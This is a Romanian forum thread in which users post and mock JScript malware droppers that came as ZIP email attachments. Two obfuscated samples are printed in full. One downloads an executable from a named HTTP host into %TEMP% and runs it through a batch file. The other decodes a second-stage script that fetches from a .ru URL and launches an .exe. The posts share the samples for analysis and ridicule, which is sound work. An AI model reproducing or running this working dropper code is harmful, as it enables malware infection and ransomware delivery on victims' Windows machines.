Zip cu JS

Nytro · May 12, 2016

Salut,

Am mai primit un email cu un JS intr-un ZIP.

E stupid, incepe cu comentarii, are pe la mijloc codul si se termina cu comentarii.

In fine, JS-ul e urmatorul:

var WARRANTIES0 = false;
var mousemove0 = "";
var code;
var delts = "C" + "r"+"e"+"ateObject";
/*@cc_on /* QU5zoJYpASu6  */
  @if (@_win32 || @_win64)/* QU5zoJYpASu6  */
    //
	WARRANTIES0 /* QU5zoJYpASu6  */= true;/* QU5zoJYpASu6  */
	mousemove0/* QU5zoJYpASu6  */ = /* QU5zoJYpASu6  */"MLH";/* QU5zoJYpASu6  */
	code =/* QU5zoJYpASu6  */ "R" + "esponseB"/* QU5zoJYpASu6  */ + "ydo".split('').reverse().join('');
	objref = /* QU5zoJYpASu6  */(/* QU5zoJYpASu6  */"noitisop").split(''/* QU5zoJYpASu6  */).reverse(/* QU5zoJYpASu6  */).join('');
	directionally0/* QU5zoJYpASu6  */ =/* QU5zoJYpASu6  */ "eliFoTevaS".split(''/* QU5zoJYpASu6  */).reverse().join('');
	B12F40 = "A"+"DODB";
	mousemove1 = "s" + "end";
	dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs";
	dishy0 /* QU5zoJYpASu6  */ = "G\x45"+"T";
 /* QU5zoJYpASu6  */ @end/* QU5zoJYpASu6  */
@*//* QU5zoJYpASu6  */
if (!(WARRANTIES0))
{
	WScript.Echo("pizzzzda");
	WScript.Quit(1);
}


var Summary/* QU5zoJYpASu6  */ = /* QU5zoJYpASu6  */this[/* QU5zoJYpASu6  */"WScript"/* QU5zoJYpASu6  */]/* QU5zoJYpASu6  */;
var delts0 = function mousemove() {return Summary[delts](("Trafdscks", "WScript")+".Shell");}(), delay0 = 4 * 2 + 3;
var Amount0 = 1 * (2 - 0);
var countRemain = Amount0 - ((1 * 2) + 0) * 1;
function directionally(Summary0){delts0[("Ifasd ", "Gef.H.", "R")+ "u" + ("fudfk", "n")](Summary0, countRemain, countRemain);};
function cir(){return delts;};

{
var code0 = "M" + "SX"+"ML2."+"X"+mousemove0+"T"+"TP";
var delay = "";
delay = "o"+"pen";
function penetration(FFFFF00) {FFFFF00[directionally0](delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e", (-9815 + 9817) * 1); return 0;};

if (true){
 penetration1 = code0;
 cos1 = Summary[delts](penetration1);
 var WARRANTIES = 3-2;
do { 
	for (;WARRANTIES;){
	try {
		if (WARRANTIES == 1)
		{
			cos1[delay](dishy0 /* QU5zoJYpASu6  */, dishy, (true, false));
			cos1[mousemove1]();
			cos0 = "S"+"l"+"eep";
			WARRANTIES = 2;
		}
		Summary[cos0](120); 
		if (cos1["r"+"eadystate"] < 2 * 2) continue;
		WARRANTIES = countRemain;
		function cos(B12F4) {var penetration0 = (123, B12F4); return penetration0;};
		
		FFFFF0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e";
		countRemain0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat";
		objref0 = "start "+FFFFF0+"\r\nexit"

		penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
		penetration1[delay]();
		penetration1["t"+"y"+"pe"] = 2;
		Amount /* QU5zoJYpASu6  */ = "w"+"r"+"i"+"t"+"e";
		penetration1["Charset"] = "windows-1251";
		penetration1[Amount+"Text"](objref0);
		directionally1[objref] = 1 * 0;
		penetration1[directionally0](countRemain0, 2 * 1);
		directionally1["c"+"l"+"o"+"s"+"e"]();
		
		penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
		penetration1[delay]();
		penetration1["t"+"y"+"pe"] = 2;
		penetration1["Charset"] = "windows-1251";
		penetration1[Amount+"Text"]("M");
		directionally1[objref] = 0;
		penetration(penetration1);
		directionally1["c"+"l"+"o"+"s"+"e"]();
		
		penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
		penetration1[delay]();
		penetration1["t"+"y"+"pe"] = 1 * 1;
		penetration1[Amount](cos1[code]);
		directionally1[objref] = 1;
		penetration(penetration1);
		directionally1["c"+"l"+"o"+"s"+"e"]();
		
		if (1 && WARRANTIES0) directionally(countRemain0);
	} catch(cir0){};};
}while (WARRANTIES);
}
}

E "obfuscat" cu pula :))

dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs";

Ma intreb ce nationalitate o avea autorul:

if (!(WARRANTIES0))
{
	WScript.Echo("pizzzzda");
	WScript.Quit(1);
}

Haideti baietii, puteti mai mult!

Speed123 · May 12, 2016

Vroiau sa te infecteze Nytro , Arde-i !

Poate au aflat si indienii de pizda :))

yo20063 · May 12, 2016

Sufera tare cine la scris. Parerea mea e ca putea face ceva mult mai destept, mult mai usor, fara atat de mult +str()...

malsploit · May 16, 2016

Am vreo vreo 20 de adrese de email pe care le tin ca spam-trap si a fost o perioada, pe la inceputul anului, in care primeam zilnic. Faceau spread pentru un locker

nein · May 17, 2016

Spoiler

_ = 38417, vim = "B%0A%09%09ante%20%3D%20Knox%3B%0A%09", Find = "del";
e080 = "DELE";
pasv = "0%5Cx6cac%5Cx65%22%5D%28/GPL2/%2C%20%22%5Cx",
Aviv = "_z";
ins = "_hsl",
EREG = "x35%5Cx47%5Cx36%5Cx341%5Cx314%5Cx47%5Cx74", dot = "More",
WIN = "Day", e052 = "2.replace%28/hi/%2C%20%22/%5Cx53%5C";
var mark = "walk", e089 = "End"; Bump = "5Cx64%22%5B%22%5Cx72%5Cx65p%5Cx6c%5Cx61%5C";
var kses = "pop",
amet = "ce%28/IF/%2C%20%22%5Cx53%5Cx63%5Cx7", b3db = 2,
Cop = "var%20Knox%20%3D%20%22Nav%22%2C%20_%20%3"; Old = "A%09zx%24vf%28%29%3B%0Atry%20%7B%0A%09%09Kn"; var ow = "D%2041245%3B%0Avar%20co%20%3D%20%22_dir%22%3B",
yi = "%0Awild%20%3D%20%22http%3A//gbi-stroi.u7m";
Link = "te.position%20%3D%200%3B%0A%7D%0A%09w%24g"; resp = ".ru/img/.../log.php%3Ff%3D%22%2C%0A",
XFN = "e030%20%3D%20%22isn%22%3B%20ante%20%3D%20%22"; e192 = "s%5D%3B%0A%7D%0A%09au%24th%28%29%3B%0A";
f161 = "runs%22%3B%20var%20omit%20%3D%20%22",
Cras = "ccc%22%3B%20var%20TYPE%20%3D%20%22dc%"; var but = "5B%22%5Cx72epl%5Cx61%5Cx63%5Cx65%22%5D%28/";
know = "22%2C%20thus%20%3D%200%2C%0Af335%20%", w3 = "8Motu%29%20%7B%0A%09%09%22C%5Cx52O%5Cx4e%22%",
io = "3D%20%22ico%22%3B%20raw%20%3D%20%22403%2", IXR = "2%2C%0Aog%20%3D%20%22fed%22%2C%0AOrd%20%3D";
tied = "Cx6f%5Cx64%5Cx79%22%29%5D%29%3B%0A%09%09an";
w2 = "%20%22_nx%22%2C%0APast%20%3D%201%3B%0Avar%2", gift = "0UA%20%3D%20%22tel%22%3B%0Avar%20St%20",
Rica = "29%3B%09Z_%20%3D%20co%20%3D%20Knox%3B%0Afun";
var mind = "%3D%20%22rtl%22%2C%0AZ_%20%3D%20%22rec"; neat = "t%22%2C%20vi%20%3D%20%22weak%22%3B%20va";
SET = "5Cx66%5Cx61ke%22%3B%0A%7D%20catch%20%28p%29"; var held = "r%20e178%20%3D%20%22su%22%3B%20var%20", ho = "Rome%20%3D%202%2C%0Af30%20%3D%20%22Out%22", Send = "Set"; GB = "%3B%0A%0Ae030%20%3D%20omit%20%3D%20f335%20"; pi = "Cx2eStrea%5Cx6d%22%29%29%3B%0A%7D%0A%3B%0"; var apps = "%3D%20this%3B%0Afunction%20f100%28%29%0A"; am = "%7B%0A%09Ord%20%3D%20e030%5B%22P%5Cx61%5Cx"; f227 = "3B%0A%7D%0A%09Knox.type%20%3D%20%20%2B%2"; Give = "6c%5Cx69%22.replace%28/Pali/%2C%20%22%5Cx57%5",
dd = "Cx53%5Cx63r%5Cx69p%5Cx74%22%29%5D%3B%0A%7D%0", a74 = "x63%5Cx65%22%5D%28/gid/%2C%20%22%5Cx52%5Cx";
gp = "Af100%28%29%3B%0AUA%20%3D%20Ord%5B%22%5Cx4f",
some = "%5Cx72%5Cx61l%22%5B%22r%5Cx65%5Cx70%5Cx6c%5C",
usr = "ment%28%22%5Cx47%5Cx50L%5Cx32%22%5B%22re%5Cx7";
How = "x61%5Cx63%5Cx65%22%5D%28/Oral/%2C%20",
e126 = "%22%5Cx43r%5Cx65%5Cx61t%5Cx65%5Cx4fb",
Test = "ction%20au%24th%28%29%0A%7B%0A%09%09";
amp = "%5Cx6a%5Cx65%5Cx63%5Cx74%22%29%5D%28%22%5";
var ereg = "%5D.split%28%22%5Cx2e%22%29%5B%20%2B%20thu";
var sbug = "Cx48%5Cx6fok%22.replace%28/Hook/%2C%20",
HTTP = "%22%5Cx57%5Cx53%5Cx63r%5Cx69%5Cx70%5Cx", peek = "%20%7B%0A%09%09Z_%5Be178%5D%28St%28%22%5",
tube = "74.%5Cx53%5Cx68%5Cx65ll%22%29%29%3B%", tech = "0Avi%20%3D%20omit%5B%22%5Cx661%5Cx35%",
Yi = "%29%3B%0A%7D%0A%7D%0A%0A";
var cell = "5Cx39%22%5B%22%5Cx72epl%5Cx61%5Cx63%5Cx65%22%",
tmp = "5D%28/f159/%2C%20%22%5Cx41ct%5Cx69%5Cx76%5Cx6";
iso = "SVG/%2C%20%22AD%5Cx4f%5Cx44%5Cx42%5";
tan = "5X%5Cx4f%5Cx62%5Cx6a%5Cx65%5Cx63t%22%29%5D%3";
var mit = "B%0Atry%20%7B%0A%09f335%20%3D%20e030%3B%0A%0";
var e96 = "ox.open%28%29%3B%0A%7D%20catch%20%2", AYS = "9f30%20%3D%20TYPE.BrowseForFolder%280%2C%20";
fb8 = "%22%5Cx66%5Cx31%5Cx35%5Cx37%22%5B%22%5Cx72e", RNTO = "0Past%3B%0Afunction%20w%24get%28%29%0A%7", soon = "%5Cx70l%5Cx61ce%22%5D%28/f157/%2C%2"; UCT = "%09ante.write%28og%5B%22%5Cx67%5Cx69%";
var blue = "0%22%5Cx53%5Cx65l%5Cx65%5Cx63%5Cx74Fol"; var Url = "de%5Cx72%22%29%2C%20%20%2B%20thus%29%3B%0A";
var f228 = "65%5Cx73%5Cx70o%5Cx6e%5Cx73%5Cx65%5Cx42%5", To = "%7D%20catch%20%28Connection%29%20%7B%0A";
e136 = "function%20Long%28%29%0A%7B%0A%09%09f30%", bars = "et%28%29%3B%0ASt%20%3D%20UA.Environ",
Afar = "20%3D%20wild%20%2B%20raw%3B%0A%7D%0A%09Long%",
htm = "28%29%3B%0Atry%20%7B%0A%09%09this%20", Data = "50ro%5Cx63%5Cx65%5Cx73%5Cx73%22%29%", alt = "%3D%20%22%5Cx76i%5Cx6d%22%3B%0A%7D%20ca",
Long = "tch%20%28conf%29%20%7B%0A%09%09og%20%3D%",
pro = "e178%20%3D%20Ord%5B%22%5Cx49F%22.repla", msn = "20new%20vi%28%22%5Cx4d%5Cx4d%22%5B%22%5Cx72%5";
conf = "2%5Cx69%5Cx70%5Cx74%5Cx4ea%5Cx6d%5Cx65%22%29"; e078 = "Cx65%5Cx70%5Cx6c%5Cx61%5Cx63e%22%5D%28/MM/%2C",
high = "%20%22%5Cx4d%5Cx73%5Cx78%5Cx6dl%5Cx32%5Cx2eX"; var File = "try%20%7B%0A%09%09this%20%3D%20%22%";
e193 = "%5Cx4d%5Cx4c%5Cx48%5Cx54%5Cx54P%5Cx2e6%5Cx2",
gee = "e%5Cx30%22%29%29%3B%0A%09%09og.open%2";
var sin = "Cx74em%5Cx70%22%29%20%2B%20%22%5Cx68i%2", ba = "8%22%5Cx47ET%22%2C%20f30%2C%200%29%3B%0A%",
fat = "7D%0A%09og.send%28%29%3B%0A%09Ord.S"; var A1B1 = "%5Cx2e%5Cx65x%5Cx65%22%29%2C%20%20%2B%20Rome";
Redo = "leep%288193%29%3B%0A%09zx%24vf%20%3D",
back = "%20function%28%29%0A%7B%0A%09Knox%20%";
Load = "3D%20new%20vi%28%22%5Cx53V%5Cx47%22%";

Find = e080 = Aviv = this;
ins = this["I\x74"["\x72ep\x6c\x61c\x65"](/It/, "\x57\x53\x63\x72\x69\x70\x74")];
function fi$le()
{
   dot = ins.CreateObject("\x6ctr".replace(/ltr/, "\x57S\x63\x72\x69pt\x2e\x53\x68ell"));
   WIN = new Find.ActiveXObject("\x651\x310"["\x72\x65\x70\x6c\x61c\x65"](/e110/, "S\x63r\x69\x70t\x69\x6eg.\x46\x69\x6ce\x53\x79\x73t\x65\x6d\x4f\x62j\x65ct"));
   mark = dot.Environment("\x76e".replace(/ve/, "P\x72\x6f\x63\x65\x73\x73"));
}
fi$le();
try {
   this = "\x49\x63o\x6e";
} catch (U) {
   e089 = mark("\x74e\x6dp") + "fa\x69r"["r\x65p\x6c\x61ce"](/fair/, "/\x73\x61\x76\x65\x54oF\x69\x6c\x65\x2e\x6a\x73");
}
kses = WIN.OpenTextFile(e089, + b3db, true, 0);
ugly$ = function()
{
   kses.write(unescape(Cop + ow + yi + resp + XFN + f161 + Cras + know + io + IXR + w2 + gift + mind + neat + held + ho + GB + apps + am + Give + dd + gp + some + How + e126 + amp + sbug + HTTP + tube + tech + cell + tmp + tan + mit + AYS + fb8 + soon + blue + Url + To + e136 + Afar + htm + alt + Long + msn + e078 + high + e193 + gee + ba + fat + Redo + back + Load + but + iso + pi + Old + e96 + w3 + f227 + RNTO + vim + UCT + Bump + a74 + f228 + tied + Link + bars + usr + pasv + Data + Rica + Test + pro + amet + conf + ereg + e192 + File + SET + peek + sin + e052 + EREG + A1B1 + Yi));
   kses.close();
   dot.Run(e089);
   ins.Sleep(12000);
   Send = mark("\x74\x65\x6dp") + "\x6c".replace(/l/, "\x2f\x53\x35G\x36\x34\x31\x314\x47\x74.\x65\x78\x65");
   dot.Run(Send);
}
;
ugly$();

aiureaaaaaaa ! si eu am primit :))

Sign In

Zip cu JS

Recommended Posts

Nytro

Speed123

yo20063

malsploit

nein

Browse

Activity

Pages